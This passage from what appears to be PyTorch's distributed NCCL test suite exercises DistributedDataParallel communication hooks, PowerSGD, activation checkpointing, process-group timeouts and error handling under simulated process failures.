int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to constructs this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
def _gpu_model_with_ddp_comm_hook(
self,
process_group,
hook=None,
gradient_as_bucket_view=False,
state=None,
static_graph=False,
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
if static_graph:
gpu_model._set_static_graph()
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(
self, gradient_as_bucket_view=False, static_graph=False
):
"""
This unit test verifies whether a DDP communication hook that just calls
allreduce gives the same result with the case of no hook registered.
Without the then callback, the future_value in reducer is no longer
a PyObject, and this unit test verifies future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
return (
process_group.allreduce(tensors)
.get_future()
.then(lambda fut: fut.value()[0])
)
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view, static_graph
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
for hook in [default.allreduce_hook, default.fp16_compress_hook]:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_hook_then_optimizer(
self,
functional_optim_cls,
*functional_optim_args,
gradient_as_bucket_view=False,
**functional_optim_kwargs
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
hook, hook_state = default.allreduce_hook, process_group
opt_hook_state = default._OptimizerHookState(
functional_optim_cls,
*functional_optim_args,
**functional_optim_kwargs,
)
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default._hook_then_optimizer(hook, opt_hook_state),
gradient_as_bucket_view,
hook_state,
)
prev_params = copy.deepcopy(list(gpu_model.parameters()))
# Run model with optimizer as part of hook
for _ in range(8):
gpu_model.zero_grad()
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
new_params = list(gpu_model.parameters())
# Run plain model with allreduce hook and separate optimizer step.
# Verify gradients are the same.
gpu_model_allreduce = self._gpu_model_with_ddp_comm_hook(
process_group, default.allreduce_hook, gradient_as_bucket_view, hook_state
)
mapping = {v: k for k, v in functional_optim_map.items()}
sgd = mapping.get(functional_optim_cls)(
gpu_model_allreduce.parameters(),
*functional_optim_args,
**functional_optim_kwargs,
)
for _ in range(8):
gpu_model_allreduce.zero_grad()
self._run_and_verify_hook(gpu_model_allreduce, 8, 0.25 * torch.ones(2, 2))
sgd.step()
post_opt_params = list(gpu_model_allreduce.parameters())
for opt_as_hook_param, post_opt_param in zip(new_params, post_opt_params):
self.assertEqual(opt_as_hook_param, post_opt_param)
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl_grad_as_bucket_view(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adamw_nccl(self):
adamw_lr = 1e-2
adamw_betas = (0.9, 0.99)
adamw_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdamW,
adamw_lr,
betas=adamw_betas,
eps=adamw_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl_grad_as_bucket_view(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_static_graph(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(static_graph=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return 10 * fut.value()[0]
def div(fut):
# Divide the result by 2.
return 0.5 * fut.value()
return fut.then(mult).then(div)
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
# check whether the grads are equal to what allreduce returns multuplied by 5.
# without the comm_hook, result would be still 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(
self.AcceptsParam(p, dev + 1), self.AcceptsParam(p, dev + 1)
).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(
m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group,
)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result:
analytic = torch.full_like(
p, 2.0 * (world * (world + 1.0) / 2.0) / world, device=dev
)
for name, p in m.named_parameters():
self.assertEqual(
p.grad,
analytic,
"mismatch at "
+ name
+ ".grad for "
+ "set_to_none = {}, use_bucket_view = {}".format(
try_set_to_none, use_bucket_view
),
)
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are referred to
# https://github.com/facebookresearch/fairscale/blob/master/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(20, 20)
self.l2 = nn.Linear(20, 20)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _prepare_dummy_data(self):
ddp_bs = 16
bs = ddp_bs * self.world_size
input = torch.rand((bs, 20), device="cuda", requires_grad=True)
target = torch.randn((bs, 20), device="cuda")
offset = self.rank * ddp_bs
ddp_input = input[offset : offset + ddp_bs]
ddp_target = target[offset : offset + ddp_bs]
return input, ddp_input, target, ddp_target
def _train_model(self, model, input_var, target, loss, run_checkpoint=False):
model.train()
if run_checkpoint:
output = checkpoint(model, input_var)
else:
output = model(input_var)
l = loss(output, target)
l.backward()
def _test_ddp_checkpointing(
self,
input_model,
process_group,
use_bucket_view,
find_unused_parameters=False,
static_graph=False,
run_checkpoint=False,
):
# to reprodce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
model = copy.deepcopy(input_model).cuda()
ddp_model = copy.deepcopy(input_model).cuda()
ddp_model = nn.parallel.DistributedDataParallel(
ddp_model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
)
if static_graph:
ddp_model._set_static_graph()
self.assertEqual(
ddp_model._get_ddp_logging_data().get("static_graph", 0), static_graph
)
input, ddp_input, target, ddp_target = self._prepare_dummy_data()
loss = nn.MSELoss()
for i in range(5):
model.zero_grad(set_to_none=False)
ddp_model.zero_grad(set_to_none=False)
self._train_model(model, input, target, loss, run_checkpoint=run_checkpoint)
self._train_model(
ddp_model, ddp_input, ddp_target, loss, run_checkpoint=run_checkpoint
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertTrue(i.grad is not None)
self.assertTrue(j.grad is not None)
self.assertEqual(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# DDP works as expect when layer is checkpointed only once
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view, static_graph in product((False, True), (False, True)):
self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
)
# DDP will fail when there are unused_parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=False,
)
# test passes when static_graph is true
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=True,
)
# DDP will fail when the same layer is checkponted twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
)
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view, static_graph in product((False, True), (False, True)):
torch.manual_seed(31415)
l1 = nn.Linear(20, 20)
l2 = nn.Linear(20, 20)
l1.weight = l2.weight
model = nn.Sequential(l1, l2)
self._test_ddp_checkpointing(
model,
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
run_checkpoint=True,
)
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d_common runs with async error handling by default, but this
# tests behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get(
"NCCL_ASYNC_ERROR_HANDLING", None
)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
# This allreduce does not block Python thread as allreduce enqueues
# the cuda operation, and then wait only blocks the current cuda
# stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait()
# Run some GPU operations to make sure cuda has not gotten stuck.
# It was observed cuda could get stuck if NCCL communicators were
# not properly aborted before throwing RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
# Clean up structures (ex: files for FileStore before going down)
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_clean_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
@sandcastle_skip(
"Frequently times out see https://github.com/pytorch/pytorch/issues/58920"
)
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.barrier().wait()
if self.rank == 0:
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait()
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
timeout = 1
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=timeout)
)
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
if self.rank == 0:
# This should timeout in about 1 second.
start = time.time()
# Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
else:
# Sleep to ensure timeout.
time.sleep(2 * timeout)
self._wait_for_comm_abort(process_group)
class CommTest(test_c10d_common.AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are idential to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_default_pg_nccl(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_default_pg(backend="nccl")
@skip_if_lt_x_gpu(2)
@requires_nccl()
def test_sequence_num_incremented_nccl_default(self):
self._test_sequence_num_incremented_default_group("nccl")
@skip_if_lt_x_gpu(4)
@requires_nccl()
def test_sequence_num_incremented_nccl_subgroup(self):
if self.world_size < 4:
return sandcastle_skip("Test requires world_size of at least 4")
self._test_sequence_num_incremented_subgroup("nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_nccl_new_group(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_new_group(backend="nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts,
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# test if the process group constructed with high priority stream
self.assertTrue(pg.options.is_high_priority_stream)
# test the process group works as expected
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 0:
